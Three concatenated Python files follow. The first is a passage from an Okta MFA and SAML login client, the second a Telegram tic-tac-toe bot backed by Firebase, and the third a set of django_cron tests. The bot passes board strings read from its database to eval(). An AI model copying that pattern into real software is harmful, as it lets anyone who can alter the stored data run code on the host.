json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response_data = response.json()
return response_data
def mfa_callback(self, auth, verification, state_token):
"""Do callback to Okta with the info from the MFA provider
Args:
auth: String auth from MFA provider to send in the callback
verification: Dict of details used in Okta API calls
state_token: String Okta state token
"""
app = verification['signature'].split(":")[1]
response_sig = "{}:{}".format(auth, app)
callback_params = "stateToken={}&sig_response={}".format(
state_token, response_sig)
url = "{}?{}".format(
verification['_links']['complete']['href'],
callback_params)
ret = self._http_client.post(url)
if ret.status_code != 200:
raise Exception("Bad status from Okta callback {}".format(
ret.status_code))
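# Hedged note (added for clarity, not in the original): with Duo Web, verification['signature']
# typically arrives as a signed request of the form "TX|...:APP|..."; the split(":")[1] above keeps
# the APP portion, so the sig_response sent back to Okta looks roughly like
#   auth = "AUTH|abc...|xyz..."                      # returned by the Duo widget/client
#   response_sig = "AUTH|abc...|xyz...:APP|def..."   # "<auth>:<app>" as built above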
def _login_multi_factor(self, state_token, login_data):
""" handle multi-factor authentication with Okta"""
factor = self._choose_factor(login_data['_embedded']['factors'])
if factor['provider'] == 'DUO':
return self._login_duo_challenge(state_token, factor)
elif factor['factorType'] == 'sms':
return self._login_send_sms(state_token, factor)
elif factor['factorType'] == 'call':
return self._login_send_call(state_token, factor)
elif factor['factorType'] == 'token:software:totp':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
elif factor['factorType'] == 'token':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
elif factor['factorType'] == 'push':
return self._login_send_push(state_token, factor)
elif factor['factorType'] == 'u2f':
return self._login_input_webauthn_challenge(state_token, factor)
elif factor['factorType'] == 'webauthn':
return self._login_input_webauthn_challenge(state_token, factor)
elif factor['factorType'] == 'token:hardware':
return self._login_input_mfa_challenge(state_token, factor['_links']['verify']['href'])
def _login_input_mfa_challenge(self, state_token, next_url):
""" Submit verification code for SMS or TOTP authentication methods"""
pass_code = self._mfa_code
if pass_code is None:
pass_code = self.ui.input("Enter verification code: ", hidden=True)
response = self._http_client.post(
next_url,
params={'rememberDevice': self._remember_device},
json={'stateToken': state_token, 'passCode': pass_code},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def _check_push_result(self, state_token, login_data):
""" Check Okta API to see if the push request has been responded to"""
time.sleep(1)
response = self._http_client.post(
login_data['_links']['next']['href'],
json={'stateToken': state_token},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
try:
if '_embedded' in response_data['_embedded']['factor']:
if response_data['_embedded']['factor']['_embedded']['challenge']['correctAnswer']:
if self._print_correct_answer:
self._print_correct_answer(response_data['_embedded']['factor']['_embedded']['challenge']['correctAnswer'])
self._print_correct_answer = None
except Exception:  # challenge/correctAnswer not present in this response
pass
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
def _check_u2f_result(self, state_token, login_data):
# should be deprecated soon as OKTA move forward webauthN
# just for backward compatibility
nonce = login_data['_embedded']['factor']['_embedded']['challenge']['nonce']
credential_id = login_data['_embedded']['factor']['profile']['credentialId']
app_id = login_data['_embedded']['factor']['profile']['appId']
verify = FactorU2F(self.ui, app_id, nonce, credential_id)
try:
client_data, signature = verify.verify()
except Exception:
signature = b'fake'
client_data = b'fake'
client_data = str(base64.urlsafe_b64encode(client_data), "utf-8")
signature_data = str(base64.urlsafe_b64encode(signature), 'utf-8')
response = self._http_client.post(
login_data['_links']['next']['href'] + "?rememberDevice=false",
json={'stateToken': state_token, 'clientData': client_data, 'signatureData': signature_data},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def _check_webauthn_result(self, state_token, login_data):
""" wait for webauthN challenge """
nonce = login_data['_embedded']['factor']['_embedded']['challenge']['challenge']
credential_id = login_data['_embedded']['factor']['profile']['credentialId']
""" Authenticator """
webauthn_client = WebAuthnClient(self.ui, self._okta_org_url, nonce, credential_id)
# noinspection PyBroadException
try:
client_data, assertion = webauthn_client.verify()
except Exception:
client_data = b'fake'
assertion = FakeAssertion()
client_data = str(base64.urlsafe_b64encode(client_data), "utf-8")
signature_data = base64.b64encode(assertion.signature).decode('utf-8')
auth_data = base64.b64encode(assertion.auth_data).decode('utf-8')
response = self._http_client.post(
login_data['_links']['next']['href'] + "?rememberDevice=false",
json={'stateToken': state_token, 'clientData': client_data, 'signatureData': signature_data,
'authenticatorData': auth_data},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
response_data = response.json()
if 'status' in response_data and response_data['status'] == 'SUCCESS':
if 'stateToken' in response_data:
return {'stateToken': response_data['stateToken'], 'apiResponse': response_data}
if 'sessionToken' in response_data:
return {'stateToken': None, 'sessionToken': response_data['sessionToken'], 'apiResponse': response_data}
else:
return {'stateToken': None, 'sessionToken': None, 'apiResponse': response_data}
def get_saml_response(self, url):
""" return the base64 SAML value object from the SAML Response"""
response = self._http_client.get(url, verify=self._verify_ssl_certs)
response.raise_for_status()
saml_response = None
relay_state = None
form_action = None
saml_soup = BeautifulSoup(response.text, "html.parser")
if saml_soup.find('form') is not None:
form_action = saml_soup.find('form').get('action')
for input_tag in saml_soup.find_all('input'):
if input_tag.get('name') == 'SAMLResponse':
saml_response = input_tag.get('value')
elif input_tag.get('name') == 'RelayState':
relay_state = input_tag.get('value')
if saml_response is None:
state_token = self._extract_state_token_from_http_response(response)
if state_token:
api_response = self.stepup_auth(url, state_token)
if 'sessionToken' in api_response:
saml_request_url = url + '?sessionToken=' + api_response['sessionToken']
else:
saml_request_url = url + '?stateToken=' + api_response['_links']['next']['href']
saml_response = self.get_saml_response(saml_request_url)
return saml_response
saml_error = 'Did not receive SAML Response after successful authentication [' + url + ']'
if saml_soup.find(class_='error-content') is not None:
saml_error += '\n' + saml_soup.find(class_='error-content').get_text()
raise RuntimeError(saml_error)
return {'SAMLResponse': saml_response, 'RelayState': relay_state, 'TargetUrl': form_action}
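# Illustrative sketch (assumed page shape, not taken from the original): the SAML page parsed
# above generally contains a POST-binding form such as
#   <form action="https://signin.aws.amazon.com/saml" method="POST">
#     <input type="hidden" name="SAMLResponse" value="base64..."/>
#     <input type="hidden" name="RelayState" value="..."/>
#   </form>
# which this method returns as {'SAMLResponse': ..., 'RelayState': ..., 'TargetUrl': <form action>}.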
def check_kwargs(self, kwargs):
if self._use_oauth_access_token is True:
if 'headers' not in kwargs:
kwargs['headers'] = {}
kwargs['headers']['Authorization'] = "Bearer {}".format(self._oauth_access_token)
if self._use_oauth_id_token is True:
if 'headers' not in kwargs:
kwargs['headers'] = {}
kwargs['headers']['Authorization'] = "Bearer {}".format(self._oauth_access_token)
return kwargs
def get(self, url, **kwargs):
""" Retrieve resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.get(url, **parameters)
def post(self, url, **kwargs):
""" Create resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.post(url, **parameters)
def put(self, url, **kwargs):
""" Modify resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.put(url, **parameters)
def delete(self, url, **kwargs):
""" Delete resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.delete(url, **parameters)
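# Sketch of how the wrappers above behave (illustrative only; 'client' is an assumed instance name):
# when _use_oauth_access_token is enabled, check_kwargs() injects a bearer header, so
#   client.get('https://example.okta.com/api/v1/users/me')
# reaches the underlying HTTP client with
#   headers={'Authorization': 'Bearer <oauth access token>'}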
def _choose_factor(self, factors):
""" gets a list of available authentication factors and
asks the user to select the factor they want to use """
self.ui.info("Multi-factor Authentication required.")
# filter the factor list down to just the types specified in preferred_mfa_type
preferred_factors = []
# Even though Duo supports both passcode and push, Okta only lists "web" as an available factor. This block
# adds the additional supported factors only when the provider is Duo and "web" is the only factor provided.
if len(factors) == 1 and factors[0].get('provider') == 'DUO' and factors[0].get('factorType') == 'web':
push = copy.deepcopy(factors[0])
push['factorType'] = "push"
factors.append(push)
passcode = copy.deepcopy(factors[0])
passcode['factorType'] = "passcode"
factors.append(passcode)
if self._preferred_mfa_type is not None:
preferred_factors = list(filter(lambda item: item['factorType'] == self._preferred_mfa_type, factors))
# If the preferred factor isn't in the list of available factors, we'll let the user know before
# prompting to select another.
if not preferred_factors:
self.ui.notify('Preferred factor type of {} not available.'.format(self._preferred_mfa_type))
if len(preferred_factors) == 1:
factor_name = self._build_factor_name(preferred_factors[0])
self.ui.info(factor_name + ' selected')
selection = factors.index(preferred_factors[0])
else:
self.ui.info("Pick a factor:")
# print out the factors and let the user select
for i, factor in enumerate(factors):
factor_name = self._build_factor_name(factor)
if factor_name != "":
self.ui.info('[{}] {}'.format(i, factor_name))
selection = self._get_user_int_factor_choice(len(factors))
# make sure the choice is valid
if selection is None:
raise errors.GimmeAWSCredsError("You made an invalid selection")
return factors[selection]
def _get_user_int_factor_choice(self, max_int, max_retries=5):
for _ in range(max_retries):
value = self.ui.input('Selection: ')
try:
selection = int(value.strip())
except ValueError:
self.ui.warning(
'Invalid selection {!r}, must be an integer value.'.format(value)
)
continue
if 0 <= selection < max_int:
return selection
else:
self.ui.warning(
'Selection {!r} out of range [0, {})'.format(selection, max_int)
)
return None
def _build_factor_name(self, factor):
""" Build the display name for a MFA factor based on the factor type"""
if factor['provider'] == 'DUO':
return factor['factorType'] + ": " + factor['provider'].capitalize()
elif factor['factorType'] == 'push':
return "Okta Verify App: " + factor['profile']['deviceType'] + ": " + factor['profile']['name']
elif factor['factorType'] == 'sms':
return factor['factorType'] + ": " + factor['profile']['phoneNumber']
elif factor['factorType'] == 'call':
return factor['factorType'] + ": " + factor['profile']['phoneNumber']
elif factor['factorType'] == 'token:software:totp':
return factor['factorType'] + "( " + factor['provider'] + " ) : " + factor['profile']['credentialId']
elif factor['factorType'] == 'token':
return factor['factorType'] + ": " + factor['profile']['credentialId']
elif factor['factorType'] == 'u2f':
return factor['factorType'] + ": " + factor['factorType']
elif factor['factorType'] == 'webauthn':
factor_name = None
try:
registered_authenticators = RegisteredAuthenticators(self.ui)
credential_id = websafe_decode(factor['profile']['credentialId'])
factor_name = registered_authenticators.get_authenticator_user(credential_id)
except Exception:
pass
default_factor_name = factor['profile'].get('authenticatorName') or factor['factorType']
factor_name = factor_name or default_factor_name
return factor['factorType'] + ": " + factor_name
elif factor['factorType'] == 'token:hardware':
return factor['factorType'] + ": " + factor['provider']
else:
return "Unknown MFA type: " + factor['factorType']
def _get_username_password_creds(self):
"""Get's creds for Okta login from the user."""
if self._username is None:
# ask the user
self._username = self.ui.input('Username: ')
username = self._username
password = self._password
if not password and self.KEYRING_ENABLED:
try:
# If the OS supports a keyring, try to read a previously saved password
password = keyring.get_password(self.KEYRING_SERVICE, username)
self.ui.info("Using password from keyring for {}".format(username))
except RuntimeError:
self.ui.warning("Unable to get password from keyring.")
if not password:
# Set prompt to include the user name, since username could be set
# via OKTA_USERNAME env and user might not remember.
for x in range(0, 5):
passwd_prompt = "Okta Password for {}: ".format(username)
password = getpass.getpass(prompt=passwd_prompt)
if len(password) > 0:
break
if self.KEYRING_ENABLED:
# If the OS supports a keyring, offer to save the password
# if self.ui.input("Do you want to save this password in the keyring? (y/N) ") == 'y':
# try:
# keyring.set_password(self.KEYRING_SERVICE, username, password)
# self.ui.info("Password for {} saved in keyring.".format(username))
# except RuntimeError as err:
# self.ui.warning("Failed to save password in keyring: " + str(err))
pass
if not password:
raise errors.GimmeAWSCredsError('Password was not provided. Exiting.')
return {'username': username, 'password': password}
def setup_fido_authenticator(self):
setup_fido_authenticator_url = self._okta_org_url + '/user/settings/factors/setup?factorType=FIDO_WEBAUTHN'
response = self._http_client.get(setup_fido_authenticator_url, headers=self._get_headers(),
verify=self._verify_ssl_certs)
response.raise_for_status()
parsed_url = urlparse(response.url)
if parsed_url and parsed_url.path == '/user/verify_password':
response = self._verify_password(response)
state_token = self._extract_state_token_from_http_response(response)
if not state_token:
raise RuntimeError('Could not extract state token from http response')
try:
self.stepup_auth(setup_fido_authenticator_url, state_token)
except errors.GimmeAWSCredsMFAEnrollStatus:
# Expected while adding a new fido authenticator
pass
response = self._http_client.get(setup_fido_authenticator_url, json={'stateToken': state_token},
headers=self._get_headers(), verify=self._verify_ssl_certs)
response.raise_for_status()
state_token = self._extract_state_token_from_http_response(response)
credential_id, user_name = self._activate_webauthn_factor(state_token)
self.ui.info('\nAuthenticator setup finished successfully.')
return credential_id, user_name
def _verify_password(self, verify_password_page_response):
creds = self._get_username_password_creds()
saml_soup = BeautifulSoup(verify_password_page_response.text, "html.parser")
token_elem = saml_soup.find(id='_xsrfToken')
if not token_elem:
raise RuntimeError('Could not find expected xsrf token in password verification page: id="_xsrfToken"')
if not token_elem.has_attr('value'):
raise RuntimeError('Could not find expected "value" attribute for xsrf dom element in password '
'verification page')
xsrf_token = token_elem.get('value')
if not xsrf_token:
raise RuntimeError('Could not find non-blank "value" attribute for xsrf dom element in password'
'verification page')
headers = self._get_headers()
# Must be form urlencoded
headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'
data = '_xsrfToken={xsrf_token}&password={password}'.format(xsrf_token=xsrf_token, password=creds['password'])
response = self._http_client.post(self._okta_org_url + '/user/verify_password',
data=data, headers=headers, verify=self._verify_ssl_certs)
response.raise_for_status()
response = self._http_client.get(
self._okta_org_url + '/login/second-factor?fromURI=%2Fenduser%2Fsettings&forcePrompt=true&hideBgImage=true',
headers=self._get_headers(), verify=self._verify_ssl_certs)
response.raise_for_status()
return response
def _activate_webauthn_factor(self, state_token):
enrollment_response = self._enroll_factor(state_token)
response_json = enrollment_response.json()
next_link = response_json['_links']['next']
if next_link['name'] != 'activate':
raise RuntimeError('Expected next link to be an activation link, actually got: ' + next_link["name"])
factor_obj = response_json['_embedded']['factor']
activation_obj = factor_obj['_embedded']['activation']
challenge = activation_obj.get('challenge')
user_obj = activation_obj.get('user', {})
webauthn_client = WebAuthnClient(self.ui, self._okta_org_url, challenge)
client_data_json, attestation = webauthn_client.make_credential(user_obj)
client_data = str(base64.urlsafe_b64encode(client_data_json), 'utf-8')
attestation_data = str(base64.urlsafe_b64encode(attestation), 'utf-8')
response = self._http_client.post(
next_link['href'],
json={"stateToken": state_token, "clientData": client_data, "attestation": attestation_data},
headers=self._get_headers(), verify=self._verify_ssl_certs)
response.raise_for_status()
session_token = response.json()['sessionToken']
redirect_url = quote(self._okta_org_url + '/enduser/settings?enrolledFactor=FIDO_WEBAUTHN')
response = self._http_client.get(
self._okta_org_url + '/login/sessionCookieRedirect?checkAccountSetupComplete=true&'
'token={session_token}&redirectUrl={redirect_url}'.format(session_token=session_token,
redirect_url=redirect_url),
headers=self._get_headers(), verify=self._verify_ssl_certs)
response.raise_for_status()
return attestation.auth_data.credential_data.credential_id, user_obj.get('name', 'gimme-aws-creds')
def _enroll_factor(self, state_token):
factors = self._introspect_factors(state_token)
if len(factors) != 1:
raise RuntimeError('Expected the state token to request enrollment for a specific factor')
# The state token should be set to return a specific factor
webauthn_factor = factors[0]
response = self._http_client.post(
webauthn_factor['_links']['enroll']['href'],
json={"stateToken": state_token, "factorType": webauthn_factor['factorType'],
"provider": webauthn_factor['provider']},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
return response
def _introspect_factors(self, state_token):
response = self._http_client.post(self._okta_org_url + '/api/v1/authn/introspect',
json={"stateToken": state_token}, headers=self._get_headers(),
verify=self._verify_ssl_certs)
response.raise_for_status()
factors = response.json()['_embedded']['factors']
if not factors:
raise RuntimeError('Could not introspect factors')
return factors
@staticmethod
def _extract_state_token_from_http_response(http_res):
saml_soup = BeautifulSoup(http_res.text, "html.parser")
if hasattr(saml_soup.title, 'string') and re.match(".* - (Extra Verification|Vérification supplémentaire)$", saml_soup.title.string):
# extract the stateToken from the Javascript code in the page and step up to MFA
# noinspection PyTypeChecker
state_token = decode(re.search(r"var stateToken = '(.*)';", http_res.text).group(1), "unicode-escape")
return state_token
for tag in saml_soup.find_all('body'):
# checking all the tags in body tag for Extra Verification string
if re.search(r"Extra Verification", tag.text, re.IGNORECASE):
# extract the stateToken from response (form action) instead of javascript variable
# noinspection PyTypeChecker
pre_state_token = decode(re.search(r"stateToken=(.*?[ \"])", http_res.text).group(1), "unicode-escape")
state_token = pre_state_token.rstrip('\"')
return state_token
return None
|
tic_tac_toe.py
|
import telebot
import pyrebase
import threading
import schedule
from time import time, sleep
from ast import literal_eval
from tabulate import tabulate
from telebot.types import InlineKeyboardButton
from telebot.types import InlineKeyboardMarkup
from telebot.types import InlineQueryResultArticle
from telebot.types import InputTextMessageContent
config = {
"apiKey" : "",
"authDomain" : "",
"databaseURL" : "",
"projectId" : "",
"storageBucket" : "",
"messagingSenderId" : "",
"appId" : "",
"measurementId" : "",
} # Your FIREBASE DATABASE configurations
def emoji_board(game): # Creates the board in ASCII format
emojis = {"-":"-", "x":"x","o":"o"}
board, temp = [], []
for count, _ in enumerate(game, 1):
if count == len(game):
temp.append(emojis[_])
board.append(temp)
elif count % 3 != 0:
temp.append(emojis[_])
else:
temp.append(emojis[_])
board.append(temp)
temp = []
return tabulate(board, tablefmt="grid")
def check_win(game, game_id): # Checks the status of the game
wins = [
(0,1,2), (3,4,5), (6,7,8), (0,4,8),
(0,3,6), (1,4,7), (2,5,8), (2,4,6),
]
for win in wins:
C1 = (game[win[0]], game[win[1]], game[win[2]]) == ("x","x","x")
C2 = (game[win[0]], game[win[1]], game[win[2]]) == ("o","o","o")
if C1 or C2:
bot.edit_message_reply_markup(inline_message_id=game_id, reply_markup=None)
winner = "X" if C1 else "O"
bot.edit_message_text(inline_message_id=game_id, text=f"<b>Congratulations! 🎉\n\
\nPlayer {winner} wins! 🥳\n\n<code>{emoji_board(game)}</code></b>")
database.child(game_id).remove()
return "True"
else:
if "-" not in game: return "Draw"
else: return "False"
firebase = pyrebase.initialize_app(config)
database = firebase.database()
API_KEY = "" # API TOKEN from @BotFather
BANNER = "" # FILE ID of banner for your bot
bot = telebot.TeleBot(API_KEY, parse_mode="HTML") # Initializing the bot
def remove_expired(): # Deletes all expired games
try:
for game in database.get().each():
expiry, id = int(game.val()["expiry"]), game.val()["id"]
if int(time()) - expiry >= 300:
database.child(id).remove()
bot.edit_message_text(inline_message_id=id, text="<b>Game expired! 🙃</b>")
bot.edit_message_reply_markup(inline_message_id=id, reply_markup=None)
except Exception:
pass
def create_game_board(game): # Creates a new empty game board
game_board, buttons = InlineKeyboardMarkup(row_width = 3), []
for pos, _ in enumerate(game, 1):
buttons.append(InlineKeyboardButton(_, callback_data=f'{pos}'))
game_board.add(*buttons)
return game_board
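# Sketch (illustrative, not part of the original bot): each button's callback_data is the
# 1-based board position as a string ("1".."9"), which callback_listener() below maps back
# to an index with int(data) - 1, e.g.
#   create_game_board(["-"] * 9)   # 3x3 inline keyboard of "-" buttons with data "1".."9"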
@bot.message_handler(commands="start")
def start(message): # Starts the bot
bot.send_photo(message.chat.id, BANNER, caption="<b>Wanna play a game of Tic-Tac-Toe?\n\
\nClick the button and play with your friends!</b>",
reply_markup = InlineKeyboardMarkup().row(InlineKeyboardButton("Play Tic-Tac-Toe!",
switch_inline_query="tic_tac_toe")))
@bot.inline_handler(lambda query: len(query.query) == 0 or query.query == 'tic_tac_toe')
def send_game(query): # Creating the inline query handler
play = InlineKeyboardMarkup().row(InlineKeyboardButton("Tap to play!",
callback_data=f"play{query.from_user.id}"))
try:
t_t_t = InlineQueryResultArticle('start_game',"丅Ꭵᑕ-丅ᗩᑕ-丅ᗝᗴ",
InputTextMessageContent("<b>Start the game! 🥳\n\nGame will be expire in 5 minutes!</b>",
parse_mode = "HTML"),reply_markup = play,
description = "Play a game of Tic-Tac-Toe with your friends and family! ✌🏻",
thumb_url = "https://github.com/TECH-SAVVY-GUY/telegram-games/blob/master/assets/tic-tac-toe.jpg?raw=true")
bot.answer_inline_query(query.id, [t_t_t])
except Exception:
pass
@bot.callback_query_handler(func=lambda call: True)
def callback_listener(call): # A single callback listener for all calls
data, game_id = call.data, call.inline_message_id
if data[:4] == "play": # Starting the game
player_x, player_o = int(data[4:]), int(call.from_user.id)
if player_o == player_x:
bot.answer_callback_query(call.id,
"⚠️ Must be a different player! ⚠️", show_alert=True)
else:
bot.edit_message_text(inline_message_id=game_id, text="<b>Game in progress!</b>")
bot.edit_message_reply_markup(inline_message_id=game_id,
reply_markup=create_game_board(["-"] * 9))
database.child(game_id).child("id").set(game_id)
database.child(game_id).child("player_x").set(int(data[4:]))
database.child(game_id).child("player_o").set(call.from_user.id)
database.child(game_id).child("count").set(1)
database.child(game_id).child("board").set(f"{['-'] * 9}")
database.child(game_id).child("expiry").set(int(time()))
elif data.isnumeric(): # Player move algorithm
if int(data) in range(1,10):
game = database.child(game_id).get()
players = [int(game.val()["player_x"]), int(game.val()["player_o"])]
if call.from_user.id not in players:
bot.answer_callback_query(call.id,
"❌ You are not a player! ❌", show_alert=True)
else:
count = int(game.val()["count"])
if count % 2 != 0:
if call.from_user.id != players[0]:
bot.answer_callback_query(call.id,
"⚠️ Wait for your Turn! ⚠️", show_alert=True)
else:
board = eval(game.val()["board"])
if board[int(data)-1] == "-":
board[int(data)-1] = "x"
bot.edit_message_reply_markup(inline_message_id=game_id,
reply_markup=create_game_board(board))
stat = check_win(board, game_id)
if stat != "True":
if str(stat) == "Draw":
bot.edit_message_reply_markup(inline_message_id=game_id, reply_markup=None)
bot.edit_message_text(inline_message_id=game_id,
text = f"<b>It's a draw! 🥱\n\n<code>{emoji_board(board)}</code></b>")
database.child(game_id).remove()
else:
database.child(game_id).update({"board":str(board)})
database.child(game_id).update({"count":count + 1})
else:
if call.from_user.id != players[-1]:
bot.answer_callback_query(call.id,
"⚠️ Wait for your Turn! ⚠️", show_alert=True)
else:
board = eval(game.val()["board"])
if board[int(data)-1] == "-":
board[int(data)-1] = "o"
bot.edit_message_reply_markup(inline_message_id=game_id,
reply_markup=create_game_board(board))
stat = check_win(board, game_id)
if stat != "True":
if str(stat) == "Draw":
bot.edit_message_reply_markup(inline_message_id=game_id, reply_markup=None)
bot.edit_message_text(inline_message_id=game_id,
text = f"<b>It's a draw! 🥱\n\n<code>{emoji_board(board)}</code></b>")
database.child(game_id).remove()
else:
database.child(game_id).update({"board":str(board)})
database.child(game_id).update({"count":count + 1})
def thrd(): # Scheduling the deletion of expired games
while True:
schedule.run_pending()
sleep(1)
schedule.every(1).minutes.do(remove_expired)
t = threading.Thread(target=thrd) # Creating a separate thread
def main(): # Executing all the threads
t.start()
bot.infinity_polling()
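# Assumed entry point (the dump above defines main() but never calls it; invoking it here
# so the scheduler thread starts and the bot begins polling):
main()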
|
tests.py
|
import threading
from time import sleep
from datetime import timedelta
from mock import patch
from freezegun import freeze_time
from django import db
from django.test import TransactionTestCase
from django.core.management import call_command
from django.test.utils import override_settings
from django.test.client import Client
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django_cron.cron import FailedRunsNotificationCronJob
from django_cron.helpers import humanize_duration
from django_cron.models import CronJobLog
import test_crons
class OutBuffer(object):
def __init__(self):
self._str_cache = ''
self.content = []
self.modified = False
def write(self, *args):
self.content.extend(args)
self.modified = True
def str_content(self):
if self.modified:
self._str_cache = ''.join((str(x) for x in self.content))
self.modified = False
return self._str_cache
def call(*args, **kwargs):
"""
Run the runcrons management command with suppressed output.
"""
out_buffer = OutBuffer()
call_command('runcrons', *args, stdout=out_buffer, **kwargs)
return out_buffer.str_content()
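# Hedged usage sketch (not in the original tests): the helper is typically invoked as
#   output = call('test_crons.TestSucessCronJob', force=True)
# and returns the captured stdout of the runcrons management command as a single string.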
class DjangoCronTestCase(TransactionTestCase):
def setUp(self):
CronJobLog.objects.all().delete()
success_cron = 'test_crons.TestSucessCronJob'
error_cron = 'test_crons.TestErrorCronJob'
five_mins_cron = 'test_crons.Test5minsCronJob'
run_at_times_cron = 'test_crons.TestRunAtTimesCronJob'
wait_3sec_cron = 'test_crons.Wait3secCronJob'
does_not_exist_cron = 'ThisCronObviouslyDoesntExist'
no_code_cron = 'test_crons.NoCodeCronJob'
test_failed_runs_notification_cron = 'django_cron.cron.FailedRunsNotificationCronJob'
class BaseTests(DjangoCronTestCase):
def assertReportedRun(self, job_cls, response):
expected_log = u"[\N{HEAVY CHECK MARK}] {0}".format(job_cls.code)
self.assertIn(expected_log.encode('utf8'), response)
def assertReportedNoRun(self, job_cls, response):
expected_log = u"[ ] {0}".format(job_cls.code)
self.assertIn(expected_log.encode('utf8'), response)
def assertReportedFail(self, job_cls, response):
expected_log = u"[\N{HEAVY BALLOT X}] {0}".format(job_cls.code)
self.assertIn(expected_log.encode('utf8'), response)
def test_success_cron(self):
logs_count = CronJobLog.objects.all().count()
call(self.success_cron, force=True)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
def test_failed_cron(self):
logs_count = CronJobLog.objects.all().count()
response = call(self.error_cron, force=True)
self.assertReportedFail(test_crons.TestErrorCronJob, response)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
def test_not_exists_cron(self):
logs_count = CronJobLog.objects.all().count()
response = call(self.does_not_exist_cron, force=True)
self.assertIn('Make sure these are valid cron class names', response)
self.assertIn(self.does_not_exist_cron, response)
self.assertEqual(CronJobLog.objects.all().count(), logs_count)
@patch('django_cron.logger')
def test_requires_code(self, mock_logger):
response = call(self.no_code_cron, force=True)
self.assertIn('does not have a code attribute', response)
mock_logger.info.assert_called()
@override_settings(DJANGO_CRON_LOCK_BACKEND='django_cron.backends.lock.file.FileLock')
def test_file_locking_backend(self):
logs_count = CronJobLog.objects.all().count()
call(self.success_cron, force=True)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
@patch.object(test_crons.TestSucessCronJob, 'do')
def test_dry_run_does_not_perform_task(self, mock_do):
response = call(self.success_cron, dry_run=True)
self.assertReportedRun(test_crons.TestSucessCronJob, response)
mock_do.assert_not_called()
self.assertFalse(CronJobLog.objects.exists())
@patch.object(test_crons.TestSucessCronJob, 'do')
def test_non_dry_run_performs_task(self, mock_do):
mock_do.return_value = 'message'
response = call(self.success_cron)
self.assertReportedRun(test_crons.TestSucessCronJob, response)
mock_do.assert_called_once()
self.assertEquals(1, CronJobLog.objects.count())
log = CronJobLog.objects.get()
self.assertEquals('message', log.message)
self.assertTrue(log.is_success)
def test_runs_every_mins(self):
logs_count = CronJobLog.objects.all().count()
with freeze_time("2014-01-01 00:00:00"):
response = call(self.five_mins_cron)
self.assertReportedRun(test_crons.Test5minsCronJob, response)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
with freeze_time("2014-01-01 00:04:59"):
response = call(self.five_mins_cron)
self.assertReportedNoRun(test_crons.Test5minsCronJob, response)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
with freeze_time("2014-01-01 00:05:01"):
response = call(self.five_mins_cron)
self.assertReportedRun(test_crons.Test5minsCronJob, response)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 2)
def test_runs_at_time(self):
logs_count = CronJobLog.objects.all().count()
with freeze_time("2014-01-01 00:00:01"):
response = call(self.run_at_times_cron)
self.assertReportedRun(test_crons.TestRunAtTimesCronJob, response)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
with freeze_time("2014-01-01 00:04:50"):
response = call(self.run_at_times_cron)
self.assertReportedNoRun(test_crons.TestRunAtTimesCronJob, response)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
with freeze_time("2014-01-01 00:05:01"):
response = call(self.run_at_times_cron)
self.assertReportedRun(test_crons.TestRunAtTimesCronJob, response)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 2)
def test_silent_produces_no_output_success(self):
response = call(self.success_cron, silent=True)
self.assertEquals(1, CronJobLog.objects.count())
self.assertEquals('', response)
def test_silent_produces_no_output_no_run(self):
with freeze_time("2014-01-01 00:00:00"):
response = call(self.run_at_times_cron, silent=True)
self.assertEquals(1, CronJobLog.objects.count())
self.assertEquals('', response)
with freeze_time("2014-01-01 00:00:01"):
response = call(self.run_at_times_cron, silent=True)
self.assertEquals(1, CronJobLog.objects.count())
self.assertEquals('', response)
def test_silent_produces_no_output_failure(self):
response = call(self.error_cron, silent=True)
self.assertEquals('', response)
def test_admin(self):
password = 'test'
user = User.objects.create_superuser(
'test',
'test@tivix.com',
password
)
self.client = Client()
self.client.login(username=user.username, password=password)
# edit CronJobLog object
call(self.success_cron, force=True)
log = CronJobLog.objects.all()[0]
url = reverse('admin:django_cron_cronjoblog_change', args=(log.id,))
response = self.client.get(url)
self.assertIn('Cron job logs', str(response.content))
def run_cronjob_in_thread(self, logs_count):
call(self.wait_3sec_cron)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
db.close_old_connections()
def test_cache_locking_backend(self):
"""
with cache locking backend
"""
logs_count = CronJobLog.objects.all().count()
t = threading.Thread(target=self.run_cronjob_in_thread, args=(logs_count,))
t.daemon = True
t.start()
